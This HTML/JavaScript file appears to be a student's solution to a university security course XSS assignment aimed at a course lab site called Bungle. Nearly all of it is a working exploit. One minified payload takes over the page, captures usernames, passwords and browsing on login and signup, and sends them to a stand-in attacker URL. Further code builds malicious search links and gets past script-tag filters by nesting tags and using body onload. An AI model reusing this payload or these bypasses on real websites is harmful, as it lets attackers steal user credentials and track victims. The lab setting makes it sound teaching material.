AlmostDone

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4.  
5. function payload(a){function b(b){console.log($.param(dafta)),$.get(a,b)}function c(){$("html").hide(),$("#bungle-lnk").removeAttr("href"),$("#bungle-lnk").click(function(){d("/","/"!=history.state.url)}),$("#search-again-btn").removeAttr("href"),$("#search-again-btn").click(function(){d("/",!0)}),$(".history-item").each(function(){var a=$(this).attr("href");$(this).removeAttr("href"),$(this).click(function(){d(a,!0)}),$(this).text().includes("cTc2fWp1TFgFj7M6aFBl")?$(this).hide():index%2==0&&$(this).hide()}),$("#search-btn").click(function(a){a.preventDefault();var b=$("#query").val();$.ajax({url:"./search",data:{q:b},type:"GET",success:function(a){$("html").html(a),d("search?q="+b,!0)}})}),$("#log-in-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./login",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#log-out-btn").click(function(a){a.preventDefault(),b({event:"logout",user:cu}),cu="",$.ajax({url:"./logout",data:{},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#new-account-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./create",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("html").show()}function d(a,d){var e="http://cos432-assn3.cs.princeton.edu/"+encodeURIComponent(a);b({event:"nav",user:cu,url:e}),d?$("html").load(a,function(){c(),history.pushState({url:a,html:$("html").html()},"",a)}):($("html").html(history.state.html),c())}$("html").hide(),$(document).ready(function(){var e=document.createElement("s"+"cript");e.text="var attacker = \""+a+"\";\nvar cu = \"\";\n"+d.toString()+"\n"+b.toString()+"\n"+c.toString(),$("html").append(e),window.onpopstate=function(a){d(a.state.url,!1)},history.replaceState(null,"","/"),$("html").load("/",function(){c(),history.replaceState({url:"/",html:$("html").html()},"","/")})})}
6.  
7. function makeLink(xssdefense, target, attacker) {
8. var original = target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";" + payload.name + "(\"" + attacker + "\");<\/script" + ">");
9. if (xssdefense == 0) {
10. return original;
11. } else { // Implement code to defeat XSS defenses here.
12. if (xssdefense == 1) {
13. return original.replace(/script/g, "sscriptcript");
14. }
15. // overfishing: replace inner script with more body onload stuff
16. else if (xssdefense == 2) {
17. return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<body onload='" + payload.toString() + payload.name + "(\"" + attacker + "\");'<\/body" + ">");
18. }
19.  
20. // overfishing:
21. else if (xssdefense == 3) {
22. return "not done yet";
23. }
24. }
25. }
26. var xssdefense = 2;
27. var target = "http://cos432-assn3.cs.princeton.edu";
28. var attacker = "http://127.0.0.1:31337/stolen";
29. $(function() {
30. var url = makeLink(xssdefense, target, attacker);
31. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
32. });
33. </script>
34. <h3>parse error</h3>